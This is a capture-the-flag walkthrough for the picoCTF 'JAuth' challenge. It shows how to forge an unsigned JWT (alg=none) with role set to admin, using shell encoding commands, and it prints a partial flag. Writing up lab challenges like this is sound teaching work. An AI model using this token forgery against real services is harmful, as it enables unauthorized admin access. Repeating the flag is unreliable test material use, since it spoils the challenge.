Description
JAuth stores session state in a JWT cookie. Because the token accepts alg=none, you can rewrite the payload to grant yourself admin access and bypass authentication.
Setup
JWT tampering
Visit http://saturn.picoctf.net:52680/ and log in with the provided test/Test123! credentials.
Open DevTools → Application → Cookies to copy the issued JWT. It contains three base64url segments separated by dots.
Solution
- Step 1Decode the tokenBase64-decode the first two segments. The header uses HS256 and the payload contains role:"user". Leave the signature segment blank for now.
- Step 2Forge an unsigned tokenChange the header to {"typ":"JWT","alg":"none"} and the payload to set "role":"admin". Base64url-encode both segments without padding and concatenate them with a trailing dot to indicate an empty signature.printf '{"typ":"JWT","alg":"none"}' | base64 | tr -d '=' | tr '+/' '-_'printf '{"role":"admin", ...}' | base64 | tr -d '=' | tr '+/' '-_'
- Step 3Swap the cookieReplace the existing JWT cookie with the forged one (header.payload.) and refresh the page. The admin view appears immediately and prints the flag.
Flag
picoCTF{succ3ss_@u7h3nt1c@710...4eacf}
JWTs that declare alg:"none" trust client-side data blindly, so editing the payload is enough to escalate privileges.